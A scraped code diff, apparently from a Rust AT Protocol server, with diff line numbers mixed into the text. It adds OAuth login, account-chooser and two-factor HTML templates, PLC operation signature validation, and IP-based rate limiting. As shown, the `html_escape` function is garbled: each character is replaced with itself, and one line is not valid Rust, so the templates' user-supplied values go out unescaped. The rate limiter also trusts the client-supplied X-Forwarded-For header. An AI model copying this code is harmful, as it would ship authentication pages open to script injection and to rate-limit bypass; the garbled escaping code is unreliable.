--error-bg: #451a1a;
45
+
--success-bg: #064e3b;
46
+
}
47
+
}
48
+
49
+
* {
50
+
box-sizing: border-box;
51
+
margin: 0;
52
+
padding: 0;
53
+
}
54
+
55
+
body {
56
+
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
57
+
background: var(--contrast-50);
58
+
color: var(--contrast-900);
59
+
min-height: 100vh;
60
+
display: flex;
61
+
align-items: center;
62
+
justify-content: center;
63
+
padding: 1rem;
64
+
line-height: 1.5;
65
+
}
66
+
67
+
.container {
68
+
width: 100%;
69
+
max-width: 400px;
70
+
padding-top: 15vh;
71
+
}
72
+
73
+
@media (max-width: 640px) {
74
+
.container {
75
+
padding-top: 2rem;
76
+
}
77
+
}
78
+
79
+
.card {
80
+
background: var(--contrast-0);
81
+
border: 1px solid var(--contrast-100);
82
+
border-radius: 0.75rem;
83
+
padding: 1.5rem;
84
+
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 8px 10px -6px rgba(0, 0, 0, 0.1);
85
+
}
86
+
87
+
@media (prefers-color-scheme: dark) {
88
+
.card {
89
+
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.4), 0 8px 10px -6px rgba(0, 0, 0, 0.3);
90
+
}
91
+
}
92
+
93
+
h1 {
94
+
font-size: 1.5rem;
95
+
font-weight: 600;
96
+
color: var(--contrast-900);
97
+
margin-bottom: 0.5rem;
98
+
}
99
+
100
+
.subtitle {
101
+
color: var(--contrast-500);
102
+
font-size: 0.875rem;
103
+
margin-bottom: 1.5rem;
104
+
}
105
+
106
+
.subtitle strong {
107
+
color: var(--contrast-700);
108
+
}
109
+
110
+
.client-info {
111
+
background: var(--contrast-25);
112
+
border-radius: 0.5rem;
113
+
padding: 1rem;
114
+
margin-bottom: 1.5rem;
115
+
}
116
+
117
+
.client-info .client-name {
118
+
font-weight: 500;
119
+
color: var(--contrast-900);
120
+
display: block;
121
+
margin-bottom: 0.25rem;
122
+
}
123
+
124
+
.client-info .scope {
125
+
color: var(--contrast-500);
126
+
font-size: 0.875rem;
127
+
}
128
+
129
+
.error-banner {
130
+
background: var(--error-bg);
131
+
color: var(--error);
132
+
border-radius: 0.5rem;
133
+
padding: 0.75rem 1rem;
134
+
margin-bottom: 1rem;
135
+
font-size: 0.875rem;
136
+
}
137
+
138
+
.form-group {
139
+
margin-bottom: 1.25rem;
140
+
}
141
+
142
+
label {
143
+
display: block;
144
+
font-size: 0.875rem;
145
+
font-weight: 500;
146
+
color: var(--contrast-700);
147
+
margin-bottom: 0.375rem;
148
+
}
149
+
150
+
input[type="text"],
151
+
input[type="email"],
152
+
input[type="password"] {
153
+
width: 100%;
154
+
padding: 0.625rem 0.875rem;
155
+
border: 2px solid var(--contrast-200);
156
+
border-radius: 0.375rem;
157
+
font-size: 1rem;
158
+
color: var(--contrast-900);
159
+
background: var(--contrast-0);
160
+
transition: border-color 0.15s, box-shadow 0.15s;
161
+
}
162
+
163
+
input[type="text"]:focus,
164
+
input[type="email"]:focus,
165
+
input[type="password"]:focus {
166
+
outline: none;
167
+
border-color: var(--primary);
168
+
box-shadow: 0 0 0 3px var(--primary-600-30);
169
+
}
170
+
171
+
input[type="text"]::placeholder,
172
+
input[type="email"]::placeholder,
173
+
input[type="password"]::placeholder {
174
+
color: var(--contrast-400);
175
+
}
176
+
177
+
.checkbox-group {
178
+
display: flex;
179
+
align-items: center;
180
+
gap: 0.5rem;
181
+
margin-bottom: 1.5rem;
182
+
}
183
+
184
+
.checkbox-group input[type="checkbox"] {
185
+
width: 1.125rem;
186
+
height: 1.125rem;
187
+
accent-color: var(--primary);
188
+
}
189
+
190
+
.checkbox-group label {
191
+
margin-bottom: 0;
192
+
font-weight: normal;
193
+
color: var(--contrast-600);
194
+
cursor: pointer;
195
+
}
196
+
197
+
.buttons {
198
+
display: flex;
199
+
gap: 0.75rem;
200
+
}
201
+
202
+
.btn {
203
+
flex: 1;
204
+
padding: 0.625rem 1.25rem;
205
+
border-radius: 0.375rem;
206
+
font-size: 1rem;
207
+
font-weight: 500;
208
+
cursor: pointer;
209
+
transition: background-color 0.15s, transform 0.1s;
210
+
border: none;
211
+
text-align: center;
212
+
text-decoration: none;
213
+
display: inline-flex;
214
+
align-items: center;
215
+
justify-content: center;
216
+
}
217
+
218
+
.btn:active {
219
+
transform: scale(0.98);
220
+
}
221
+
222
+
.btn-primary {
223
+
background: var(--primary);
224
+
color: var(--primary-contrast);
225
+
}
226
+
227
+
.btn-primary:hover {
228
+
background: var(--primary-hover);
229
+
}
230
+
231
+
.btn-primary:disabled {
232
+
background: var(--primary-400);
233
+
cursor: not-allowed;
234
+
}
235
+
236
+
.btn-secondary {
237
+
background: var(--contrast-500);
238
+
color: white;
239
+
}
240
+
241
+
.btn-secondary:hover {
242
+
background: var(--contrast-600);
243
+
}
244
+
245
+
.footer {
246
+
text-align: center;
247
+
margin-top: 1.5rem;
248
+
font-size: 0.75rem;
249
+
color: var(--contrast-400);
250
+
}
251
+
252
+
.accounts {
253
+
display: flex;
254
+
flex-direction: column;
255
+
gap: 0.5rem;
256
+
margin-bottom: 1rem;
257
+
}
258
+
259
+
.account-item {
260
+
display: flex;
261
+
align-items: center;
262
+
gap: 0.75rem;
263
+
width: 100%;
264
+
padding: 0.75rem;
265
+
background: var(--contrast-25);
266
+
border: 1px solid var(--contrast-100);
267
+
border-radius: 0.5rem;
268
+
cursor: pointer;
269
+
transition: background-color 0.15s, border-color 0.15s;
270
+
text-align: left;
271
+
}
272
+
273
+
.account-item:hover {
274
+
background: var(--contrast-50);
275
+
border-color: var(--contrast-200);
276
+
}
277
+
278
+
.avatar {
279
+
width: 2.5rem;
280
+
height: 2.5rem;
281
+
border-radius: 50%;
282
+
background: var(--primary);
283
+
color: var(--primary-contrast);
284
+
display: flex;
285
+
align-items: center;
286
+
justify-content: center;
287
+
font-weight: 600;
288
+
font-size: 0.875rem;
289
+
flex-shrink: 0;
290
+
}
291
+
292
+
.account-info {
293
+
flex: 1;
294
+
min-width: 0;
295
+
}
296
+
297
+
.account-info .handle {
298
+
display: block;
299
+
font-weight: 500;
300
+
color: var(--contrast-900);
301
+
overflow: hidden;
302
+
text-overflow: ellipsis;
303
+
white-space: nowrap;
304
+
}
305
+
306
+
.account-info .email {
307
+
display: block;
308
+
font-size: 0.875rem;
309
+
color: var(--contrast-500);
310
+
overflow: hidden;
311
+
text-overflow: ellipsis;
312
+
white-space: nowrap;
313
+
}
314
+
315
+
.chevron {
316
+
color: var(--contrast-400);
317
+
font-size: 1.25rem;
318
+
flex-shrink: 0;
319
+
}
320
+
321
+
.divider {
322
+
height: 1px;
323
+
background: var(--contrast-100);
324
+
margin: 1rem 0;
325
+
}
326
+
327
+
.link-button {
328
+
background: none;
329
+
border: none;
330
+
color: var(--primary);
331
+
cursor: pointer;
332
+
font-size: inherit;
333
+
padding: 0;
334
+
text-decoration: underline;
335
+
}
336
+
337
+
.link-button:hover {
338
+
color: var(--primary-hover);
339
+
}
340
+
341
+
.new-account-link {
342
+
display: block;
343
+
text-align: center;
344
+
color: var(--primary);
345
+
text-decoration: none;
346
+
font-size: 0.875rem;
347
+
}
348
+
349
+
.new-account-link:hover {
350
+
text-decoration: underline;
351
+
}
352
+
353
+
.help-text {
354
+
text-align: center;
355
+
margin-top: 1rem;
356
+
font-size: 0.875rem;
357
+
color: var(--contrast-500);
358
+
}
359
+
360
+
.icon {
361
+
font-size: 3rem;
362
+
margin-bottom: 1rem;
363
+
}
364
+
365
+
.error-code {
366
+
background: var(--error-bg);
367
+
color: var(--error);
368
+
padding: 0.5rem 1rem;
369
+
border-radius: 0.375rem;
370
+
font-family: monospace;
371
+
display: inline-block;
372
+
margin-bottom: 1rem;
373
+
}
374
+
375
+
.success-icon {
376
+
width: 3rem;
377
+
height: 3rem;
378
+
border-radius: 50%;
379
+
background: var(--success-bg);
380
+
color: var(--success);
381
+
display: flex;
382
+
align-items: center;
383
+
justify-content: center;
384
+
font-size: 1.5rem;
385
+
margin: 0 auto 1rem;
386
+
}
387
+
388
+
.text-center {
389
+
text-align: center;
390
+
}
391
+
392
+
.code-input {
393
+
letter-spacing: 0.5em;
394
+
text-align: center;
395
+
font-size: 1.5rem;
396
+
font-family: monospace;
397
+
}
398
+
"#
399
+
}
400
+
401
+
pub fn login_page(
402
+
client_id: &str,
403
+
client_name: Option<&str>,
404
+
scope: Option<&str>,
405
+
request_uri: &str,
406
+
error_message: Option<&str>,
407
+
login_hint: Option<&str>,
408
+
) -> String {
409
+
let client_display = client_name.unwrap_or(client_id);
410
+
let scope_display = scope.unwrap_or("access your account");
411
+
412
+
let error_html = error_message
413
+
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
414
+
.unwrap_or_default();
415
+
416
+
let login_hint_value = login_hint.unwrap_or("");
417
+
418
+
format!(
419
+
r#"<!DOCTYPE html>
420
+
<html lang="en">
421
+
<head>
422
+
<meta charset="UTF-8">
423
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
424
+
<meta name="robots" content="noindex">
425
+
<title>Sign in</title>
426
+
<style>{styles}</style>
427
+
</head>
428
+
<body>
429
+
<div class="container">
430
+
<div class="card">
431
+
<h1>Sign in</h1>
432
+
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
433
+
434
+
<div class="client-info">
435
+
<span class="client-name">{client_display}</span>
436
+
<span class="scope">wants to {scope_display}</span>
437
+
</div>
438
+
439
+
{error_html}
440
+
441
+
<form method="POST" action="/oauth/authorize">
442
+
<input type="hidden" name="request_uri" value="{request_uri}">
443
+
444
+
<div class="form-group">
445
+
<label for="username">Handle or Email</label>
446
+
<input type="text" id="username" name="username" value="{login_hint_value}"
447
+
required autocomplete="username" autofocus
448
+
placeholder="you@example.com">
449
+
</div>
450
+
451
+
<div class="form-group">
452
+
<label for="password">Password</label>
453
+
<input type="password" id="password" name="password" required
454
+
autocomplete="current-password" placeholder="Enter your password">
455
+
</div>
456
+
457
+
<div class="checkbox-group">
458
+
<input type="checkbox" id="remember_device" name="remember_device" value="true">
459
+
<label for="remember_device">Remember this device</label>
460
+
</div>
461
+
462
+
<div class="buttons">
463
+
<button type="submit" formaction="/oauth/authorize/deny" class="btn btn-secondary">Cancel</button>
464
+
<button type="submit" class="btn btn-primary">Sign in</button>
465
+
</div>
466
+
</form>
467
+
468
+
<div class="footer">
469
+
By signing in, you agree to share your account information with this application.
470
+
</div>
471
+
</div>
472
+
</div>
473
+
</body>
474
+
</html>"#,
475
+
styles = base_styles(),
476
+
client_display = html_escape(client_display),
477
+
scope_display = html_escape(scope_display),
478
+
request_uri = html_escape(request_uri),
479
+
error_html = error_html,
480
+
login_hint_value = html_escape(login_hint_value),
481
+
)
482
+
}
483
+
484
+
pub struct DeviceAccount {
485
+
pub did: String,
486
+
pub handle: String,
487
+
pub email: String,
488
+
pub last_used_at: DateTime<Utc>,
489
+
}
490
+
491
+
pub fn account_selector_page(
492
+
client_id: &str,
493
+
client_name: Option<&str>,
494
+
request_uri: &str,
495
+
accounts: &[DeviceAccount],
496
+
) -> String {
497
+
let client_display = client_name.unwrap_or(client_id);
498
+
499
+
let accounts_html: String = accounts
500
+
.iter()
501
+
.map(|account| {
502
+
let initials = get_initials(&account.handle);
503
+
format!(
504
+
r#"<form method="POST" action="/oauth/authorize/select" style="margin:0">
505
+
<input type="hidden" name="request_uri" value="{request_uri}">
506
+
<input type="hidden" name="did" value="{did}">
507
+
<button type="submit" class="account-item">
508
+
<div class="avatar">{initials}</div>
509
+
<div class="account-info">
510
+
<span class="handle">@{handle}</span>
511
+
<span class="email">{email}</span>
512
+
</div>
513
+
<span class="chevron">›</span>
514
+
</button>
515
+
</form>"#,
516
+
request_uri = html_escape(request_uri),
517
+
did = html_escape(&account.did),
518
+
initials = html_escape(&initials),
519
+
handle = html_escape(&account.handle),
520
+
email = html_escape(&account.email),
521
+
)
522
+
})
523
+
.collect();
524
+
525
+
format!(
526
+
r#"<!DOCTYPE html>
527
+
<html lang="en">
528
+
<head>
529
+
<meta charset="UTF-8">
530
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
531
+
<meta name="robots" content="noindex">
532
+
<title>Choose an account</title>
533
+
<style>{styles}</style>
534
+
</head>
535
+
<body>
536
+
<div class="container">
537
+
<div class="card">
538
+
<h1>Choose an account</h1>
539
+
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
540
+
541
+
<div class="accounts">
542
+
{accounts_html}
543
+
</div>
544
+
545
+
<div class="divider"></div>
546
+
547
+
<a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link">
548
+
Sign in with another account
549
+
</a>
550
+
</div>
551
+
</div>
552
+
</body>
553
+
</html>"#,
554
+
styles = base_styles(),
555
+
client_display = html_escape(client_display),
556
+
accounts_html = accounts_html,
557
+
request_uri_encoded = urlencoding::encode(request_uri),
558
+
)
559
+
}
560
+
561
+
pub fn two_factor_page(
562
+
request_uri: &str,
563
+
channel: &str,
564
+
error_message: Option<&str>,
565
+
) -> String {
566
+
let error_html = error_message
567
+
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
568
+
.unwrap_or_default();
569
+
570
+
let (title, subtitle) = match channel {
571
+
"email" => ("Check your email", "We sent a verification code to your email"),
572
+
"Discord" => ("Check Discord", "We sent a verification code to your Discord"),
573
+
"Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"),
574
+
"Signal" => ("Check Signal", "We sent a verification code to your Signal"),
575
+
_ => ("Check your messages", "We sent you a verification code"),
576
+
};
577
+
578
+
format!(
579
+
r#"<!DOCTYPE html>
580
+
<html lang="en">
581
+
<head>
582
+
<meta charset="UTF-8">
583
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
584
+
<meta name="robots" content="noindex">
585
+
<title>Verify your identity</title>
586
+
<style>{styles}</style>
587
+
</head>
588
+
<body>
589
+
<div class="container">
590
+
<div class="card">
591
+
<h1>{title}</h1>
592
+
<p class="subtitle">{subtitle}</p>
593
+
594
+
{error_html}
595
+
596
+
<form method="POST" action="/oauth/authorize/2fa">
597
+
<input type="hidden" name="request_uri" value="{request_uri}">
598
+
599
+
<div class="form-group">
600
+
<label for="code">Verification code</label>
601
+
<input type="text" id="code" name="code" class="code-input"
602
+
placeholder="000000"
603
+
pattern="[0-9]{{6}}" maxlength="6"
604
+
inputmode="numeric" autocomplete="one-time-code"
605
+
autofocus required>
606
+
</div>
607
+
608
+
<button type="submit" class="btn btn-primary" style="width:100%">Verify</button>
609
+
</form>
610
+
611
+
<p class="help-text">
612
+
Code expires in 10 minutes.
613
+
</p>
614
+
</div>
615
+
</div>
616
+
</body>
617
+
</html>"#,
618
+
styles = base_styles(),
619
+
title = title,
620
+
subtitle = subtitle,
621
+
request_uri = html_escape(request_uri),
622
+
error_html = error_html,
623
+
)
624
+
}
625
+
626
+
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
627
+
let description = error_description.unwrap_or("An error occurred during the authorization process.");
628
+
629
+
format!(
630
+
r#"<!DOCTYPE html>
631
+
<html lang="en">
632
+
<head>
633
+
<meta charset="UTF-8">
634
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
635
+
<meta name="robots" content="noindex">
636
+
<title>Authorization Error</title>
637
+
<style>{styles}</style>
638
+
</head>
639
+
<body>
640
+
<div class="container">
641
+
<div class="card text-center">
642
+
<div class="icon">⚠️</div>
643
+
<h1>Authorization Failed</h1>
644
+
<div class="error-code">{error}</div>
645
+
<p class="subtitle" style="margin-bottom:0">{description}</p>
646
+
<div style="margin-top:1.5rem">
647
+
<button onclick="window.close()" class="btn btn-secondary">Close this window</button>
648
+
</div>
649
+
</div>
650
+
</div>
651
+
</body>
652
+
</html>"#,
653
+
styles = base_styles(),
654
+
error = html_escape(error),
655
+
description = html_escape(description),
656
+
)
657
+
}
658
+
659
+
pub fn success_page(client_name: Option<&str>) -> String {
660
+
let client_display = client_name.unwrap_or("The application");
661
+
662
+
format!(
663
+
r#"<!DOCTYPE html>
664
+
<html lang="en">
665
+
<head>
666
+
<meta charset="UTF-8">
667
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
668
+
<meta name="robots" content="noindex">
669
+
<title>Authorization Successful</title>
670
+
<style>{styles}</style>
671
+
</head>
672
+
<body>
673
+
<div class="container">
674
+
<div class="card text-center">
675
+
<div class="success-icon">✓</div>
676
+
<h1 style="color:var(--success)">Authorization Successful</h1>
677
+
<p class="subtitle">{client_display} has been granted access to your account.</p>
678
+
<p class="help-text">You can close this window and return to the application.</p>
679
+
</div>
680
+
</div>
681
+
</body>
682
+
</html>"#,
683
+
styles = base_styles(),
684
+
client_display = html_escape(client_display),
685
+
)
686
+
}
687
+
688
+
fn html_escape(s: &str) -> String {
689
+
s.replace('&', "&")
690
+
.replace('<', "<")
691
+
.replace('>', ">")
692
+
.replace('"', """)
693
+
.replace('\'', "'")
694
+
}
695
+
696
+
fn get_initials(handle: &str) -> String {
697
+
let clean = handle.trim_start_matches('@');
698
+
if clean.is_empty() {
699
+
return "?".to_string();
700
+
}
701
+
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
702
+
}
703
+
704
+
pub fn mask_email(email: &str) -> String {
705
+
if let Some(at_pos) = email.find('@') {
706
+
let local = &email[..at_pos];
707
+
let domain = &email[at_pos..];
708
+
709
+
if local.len() <= 2 {
710
+
format!("{}***{}", local.chars().next().unwrap_or('*'), domain)
711
+
} else {
712
+
let first = local.chars().next().unwrap_or('*');
713
+
let last = local.chars().last().unwrap_or('*');
714
+
format!("{}***{}{}", first, last, domain)
715
+
}
716
+
} else {
717
+
"***".to_string()
718
+
}
719
+
}
+158
src/plc/mod.rs
+158
src/plc/mod.rs
···
319
Ok(())
320
}
321
322
+
pub struct PlcValidationContext {
323
+
pub server_rotation_key: String,
324
+
pub expected_signing_key: String,
325
+
pub expected_handle: String,
326
+
pub expected_pds_endpoint: String,
327
+
}
328
+
329
+
pub fn validate_plc_operation_for_submission(
330
+
op: &Value,
331
+
ctx: &PlcValidationContext,
332
+
) -> Result<(), PlcError> {
333
+
validate_plc_operation(op)?;
334
+
335
+
let obj = op.as_object()
336
+
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
337
+
338
+
let op_type = obj.get("type")
339
+
.and_then(|v| v.as_str())
340
+
.unwrap_or("");
341
+
342
+
if op_type != "plc_operation" {
343
+
return Ok(());
344
+
}
345
+
346
+
let rotation_keys = obj.get("rotationKeys")
347
+
.and_then(|v| v.as_array())
348
+
.ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?;
349
+
350
+
let rotation_key_strings: Vec<&str> = rotation_keys
351
+
.iter()
352
+
.filter_map(|v| v.as_str())
353
+
.collect();
354
+
355
+
if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) {
356
+
return Err(PlcError::InvalidResponse(
357
+
"Rotation keys do not include server's rotation key".to_string()
358
+
));
359
+
}
360
+
361
+
let verification_methods = obj.get("verificationMethods")
362
+
.and_then(|v| v.as_object())
363
+
.ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?;
364
+
365
+
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
366
+
if atproto_key != ctx.expected_signing_key {
367
+
return Err(PlcError::InvalidResponse("Incorrect signing key".to_string()));
368
+
}
369
+
}
370
+
371
+
let also_known_as = obj.get("alsoKnownAs")
372
+
.and_then(|v| v.as_array())
373
+
.ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?;
374
+
375
+
let expected_handle_uri = format!("at://{}", ctx.expected_handle);
376
+
let has_correct_handle = also_known_as
377
+
.iter()
378
+
.filter_map(|v| v.as_str())
379
+
.any(|s| s == expected_handle_uri);
380
+
381
+
if !has_correct_handle && !also_known_as.is_empty() {
382
+
return Err(PlcError::InvalidResponse(
383
+
"Incorrect handle in alsoKnownAs".to_string()
384
+
));
385
+
}
386
+
387
+
let services = obj.get("services")
388
+
.and_then(|v| v.as_object())
389
+
.ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?;
390
+
391
+
if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) {
392
+
let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or("");
393
+
if service_type != "AtprotoPersonalDataServer" {
394
+
return Err(PlcError::InvalidResponse(
395
+
"Incorrect type on atproto_pds service".to_string()
396
+
));
397
+
}
398
+
399
+
let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or("");
400
+
if endpoint != ctx.expected_pds_endpoint {
401
+
return Err(PlcError::InvalidResponse(
402
+
"Incorrect endpoint on atproto_pds service".to_string()
403
+
));
404
+
}
405
+
}
406
+
407
+
Ok(())
408
+
}
409
+
410
+
pub fn verify_operation_signature(
411
+
op: &Value,
412
+
rotation_keys: &[String],
413
+
) -> Result<bool, PlcError> {
414
+
let obj = op.as_object()
415
+
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
416
+
417
+
let sig_b64 = obj.get("sig")
418
+
.and_then(|v| v.as_str())
419
+
.ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?;
420
+
421
+
let sig_bytes = URL_SAFE_NO_PAD
422
+
.decode(sig_b64)
423
+
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature encoding: {}", e)))?;
424
+
425
+
let signature = Signature::from_slice(&sig_bytes)
426
+
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature format: {}", e)))?;
427
+
428
+
let mut unsigned_op = op.clone();
429
+
if let Some(unsigned_obj) = unsigned_op.as_object_mut() {
430
+
unsigned_obj.remove("sig");
431
+
}
432
+
433
+
let cbor_bytes = serde_ipld_dagcbor::to_vec(&unsigned_op)
434
+
.map_err(|e| PlcError::Serialization(e.to_string()))?;
435
+
436
+
for key_did in rotation_keys {
437
+
if let Ok(true) = verify_signature_with_did_key(key_did, &cbor_bytes, &signature) {
438
+
return Ok(true);
439
+
}
440
+
}
441
+
442
+
Ok(false)
443
+
}
444
+
445
+
fn verify_signature_with_did_key(
446
+
did_key: &str,
447
+
message: &[u8],
448
+
signature: &Signature,
449
+
) -> Result<bool, PlcError> {
450
+
use k256::ecdsa::{VerifyingKey, signature::Verifier};
451
+
452
+
if !did_key.starts_with("did:key:z") {
453
+
return Err(PlcError::InvalidResponse("Invalid did:key format".to_string()));
454
+
}
455
+
456
+
let multibase_part = &did_key[8..];
457
+
let (_, decoded) = multibase::decode(multibase_part)
458
+
.map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?;
459
+
460
+
if decoded.len() < 2 {
461
+
return Err(PlcError::InvalidResponse("Invalid did:key data".to_string()));
462
+
}
463
+
464
+
let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 {
465
+
(0xe701u16, &decoded[2..])
466
+
} else {
467
+
return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string()));
468
+
};
469
+
470
+
if codec != 0xe701 {
471
+
return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string()));
472
+
}
473
+
474
+
let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes)
475
+
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
476
+
477
+
Ok(verifying_key.verify(message, signature).is_ok())
478
+
}
479
+
480
#[cfg(test)]
481
mod tests {
482
use super::*;
+216
src/rate_limit.rs
+216
src/rate_limit.rs
···
···
1
+
use axum::{
2
+
body::Body,
3
+
extract::ConnectInfo,
4
+
http::{HeaderMap, Request, StatusCode},
5
+
middleware::Next,
6
+
response::{IntoResponse, Response},
7
+
Json,
8
+
};
9
+
use governor::{
10
+
Quota, RateLimiter,
11
+
clock::DefaultClock,
12
+
state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore},
13
+
};
14
+
use std::{
15
+
net::SocketAddr,
16
+
num::NonZeroU32,
17
+
sync::Arc,
18
+
};
19
+
20
+
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
21
+
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
22
+
23
+
#[derive(Clone)]
24
+
pub struct RateLimiters {
25
+
pub login: Arc<KeyedRateLimiter>,
26
+
pub oauth_token: Arc<KeyedRateLimiter>,
27
+
pub password_reset: Arc<KeyedRateLimiter>,
28
+
pub account_creation: Arc<KeyedRateLimiter>,
29
+
}
30
+
31
+
impl Default for RateLimiters {
32
+
fn default() -> Self {
33
+
Self::new()
34
+
}
35
+
}
36
+
37
+
impl RateLimiters {
38
+
pub fn new() -> Self {
39
+
Self {
40
+
login: Arc::new(RateLimiter::keyed(
41
+
Quota::per_minute(NonZeroU32::new(10).unwrap())
42
+
)),
43
+
oauth_token: Arc::new(RateLimiter::keyed(
44
+
Quota::per_minute(NonZeroU32::new(30).unwrap())
45
+
)),
46
+
password_reset: Arc::new(RateLimiter::keyed(
47
+
Quota::per_hour(NonZeroU32::new(5).unwrap())
48
+
)),
49
+
account_creation: Arc::new(RateLimiter::keyed(
50
+
Quota::per_hour(NonZeroU32::new(10).unwrap())
51
+
)),
52
+
}
53
+
}
54
+
55
+
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
56
+
self.login = Arc::new(RateLimiter::keyed(
57
+
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
58
+
));
59
+
self
60
+
}
61
+
62
+
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
63
+
self.oauth_token = Arc::new(RateLimiter::keyed(
64
+
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
65
+
));
66
+
self
67
+
}
68
+
69
+
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
70
+
self.password_reset = Arc::new(RateLimiter::keyed(
71
+
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
72
+
));
73
+
self
74
+
}
75
+
76
+
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
77
+
self.account_creation = Arc::new(RateLimiter::keyed(
78
+
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
79
+
));
80
+
self
81
+
}
82
+
}
83
+
84
+
fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
85
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
86
+
if let Ok(value) = forwarded.to_str() {
87
+
if let Some(first_ip) = value.split(',').next() {
88
+
return first_ip.trim().to_string();
89
+
}
90
+
}
91
+
}
92
+
93
+
if let Some(real_ip) = headers.get("x-real-ip") {
94
+
if let Ok(value) = real_ip.to_str() {
95
+
return value.trim().to_string();
96
+
}
97
+
}
98
+
99
+
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
100
+
}
101
+
102
+
fn rate_limit_response() -> Response {
103
+
(
104
+
StatusCode::TOO_MANY_REQUESTS,
105
+
Json(serde_json::json!({
106
+
"error": "RateLimitExceeded",
107
+
"message": "Too many requests. Please try again later."
108
+
})),
109
+
)
110
+
.into_response()
111
+
}
112
+
113
+
pub async fn login_rate_limit(
114
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
115
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
116
+
request: Request<Body>,
117
+
next: Next,
118
+
) -> Response {
119
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
120
+
121
+
if limiters.login.check_key(&client_ip).is_err() {
122
+
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
123
+
return rate_limit_response();
124
+
}
125
+
126
+
next.run(request).await
127
+
}
128
+
129
+
pub async fn oauth_token_rate_limit(
130
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
131
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
132
+
request: Request<Body>,
133
+
next: Next,
134
+
) -> Response {
135
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
136
+
137
+
if limiters.oauth_token.check_key(&client_ip).is_err() {
138
+
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
139
+
return rate_limit_response();
140
+
}
141
+
142
+
next.run(request).await
143
+
}
144
+
145
+
pub async fn password_reset_rate_limit(
146
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
147
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
148
+
request: Request<Body>,
149
+
next: Next,
150
+
) -> Response {
151
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
152
+
153
+
if limiters.password_reset.check_key(&client_ip).is_err() {
154
+
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
155
+
return rate_limit_response();
156
+
}
157
+
158
+
next.run(request).await
159
+
}
160
+
161
+
pub async fn account_creation_rate_limit(
162
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
163
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
164
+
request: Request<Body>,
165
+
next: Next,
166
+
) -> Response {
167
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
168
+
169
+
if limiters.account_creation.check_key(&client_ip).is_err() {
170
+
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
171
+
return rate_limit_response();
172
+
}
173
+
174
+
next.run(request).await
175
+
}
176
+
177
+
#[cfg(test)]
178
+
mod tests {
179
+
use super::*;
180
+
181
+
#[test]
182
+
fn test_rate_limiters_creation() {
183
+
let limiters = RateLimiters::new();
184
+
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
185
+
}
186
+
187
+
#[test]
188
+
